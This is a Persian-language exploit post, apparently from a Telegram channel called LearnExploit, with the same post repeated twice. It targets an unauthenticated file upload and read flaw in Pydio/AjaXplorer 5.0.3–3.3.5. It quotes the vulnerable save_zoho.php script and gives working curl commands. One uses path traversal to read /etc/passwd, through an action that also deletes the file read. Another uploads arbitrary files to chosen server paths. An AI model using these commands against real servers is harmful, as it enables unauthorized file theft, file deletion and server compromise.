🔺🔻🔸🔹🔶🔷
🔳🔲▪️▫️◾️
⬜️⬛️◻️◼️
◽️♦️🗨
♠️♣️
✔️
#File #Upload #Vulnerability in #Pydio_AjaXplorer (Pydio/AjaXplorer) V 5.0.3 – 3.3.5
————————————-
#~Exploit Title : Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
آسیب پذیری فایل اپلود در (Pydio/AjaXplorer) ورژن 5.0.3 – 3.3.5
➖➖➖➖➖➖➖➖➖➖
#~Affected file :
فایل اسیب دیده : ( برای درک بهتر تصویر مطالعه شود !)
:::: `/plugins/editor.zoho/agent/save_zoho.php` ::::
<?php
$vars = array_merge($_GET, $_POST);
if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}
?>
➖➖➖➖➖➖➖➖➖➖
#~Options :
گزینه ها :
option 1 :
اگر ajxp_action تنظیم (ست) نشده باشد، فایل content رو به قسمت files/id.format اپلود کنید.
در این مورد کد قبل از اینکه فرمت فایل ها رو چک کنه فایل رو به عنوان یک ارگومان به بخش move_uploded_file میده .
که این میتونه فرصتی برای اپلود فایل خودتون باشه...
نکته : برای اینکه توانایی موارد بالا رو داتشه باشید باید کاربر دسترسی لازم برای ادیت فایل رو داشته باشه.
option 2 :
اگر ajxp_action در بخش get_file تنظیم شده باشد (ست شده باشد)، شما میتوانید فایل رو از files/name بخوانید و بخش مد نظر رو حذف کنید !
که در این حالت دوباره کد نمیتونه پارامتر name رو تشخیص بده که این موردم میتونه باگ باشه.
➖➖➖➖➖➖➖➖➖➖
#~Filesdirectory's :
ادرس فایل :
ادرس پیشفرض فایل ها :
#~Read arbitrary files :
نحوه ی خواندن فایل :
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"
مانند :
"http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
➖➖➖➖➖➖➖➖➖➖
#~Arbitrary File Upload :
نحوه ی اپلود فایل دلخواه :
curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"
مانند :
curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"
➖➖➖➖➖➖➖➖➖➖
با تشکر از همراهان عزیز.
Software link
Exploit link
————————————-
@LearnExploit - 0DayBoy 's in Iran :)
🔳🔲▪️▫️◾️
⬜️⬛️◻️◼️
◽️♦️🗨
♠️♣️
✔️
#File #Upload #Vulnerability in #Pydio_AjaXplorer (Pydio/AjaXplorer) V 5.0.3 – 3.3.5
————————————-
#~Exploit Title : Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
آسیب پذیری فایل اپلود در (Pydio/AjaXplorer) ورژن 5.0.3 – 3.3.5
➖➖➖➖➖➖➖➖➖➖
#~Affected file :
فایل اسیب دیده : ( برای درک بهتر تصویر مطالعه شود !)
:::: `/plugins/editor.zoho/agent/save_zoho.php` ::::
<?php
$vars = array_merge($_GET, $_POST);
if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}
?>
➖➖➖➖➖➖➖➖➖➖
#~Options :
گزینه ها :
option 1 :
اگر ajxp_action تنظیم (ست) نشده باشد، فایل content رو به قسمت files/id.format اپلود کنید.
در این مورد کد قبل از اینکه فرمت فایل ها رو چک کنه فایل رو به عنوان یک ارگومان به بخش move_uploded_file میده .
که این میتونه فرصتی برای اپلود فایل خودتون باشه...
نکته : برای اینکه توانایی موارد بالا رو داتشه باشید باید کاربر دسترسی لازم برای ادیت فایل رو داشته باشه.
option 2 :
اگر ajxp_action در بخش get_file تنظیم شده باشد (ست شده باشد)، شما میتوانید فایل رو از files/name بخوانید و بخش مد نظر رو حذف کنید !
که در این حالت دوباره کد نمیتونه پارامتر name رو تشخیص بده که این موردم میتونه باگ باشه.
➖➖➖➖➖➖➖➖➖➖
#~Filesdirectory's :
ادرس فایل :
ادرس پیشفرض فایل ها :
/plugins/editor.zoho/agent/files
ادرس پیشفرض برای خواندن فایل های اپلود شده :/plugins/editor.zoho/data/files/
➖➖➖➖➖➖➖➖➖➖#~Read arbitrary files :
نحوه ی خواندن فایل :
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"
مانند :
"http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
➖➖➖➖➖➖➖➖➖➖
#~Arbitrary File Upload :
نحوه ی اپلود فایل دلخواه :
curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"
مانند :
curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"
➖➖➖➖➖➖➖➖➖➖
با تشکر از همراهان عزیز.
Software link
Exploit link
————————————-
@LearnExploit - 0DayBoy 's in Iran :)
Telegram
AttachLearnExploit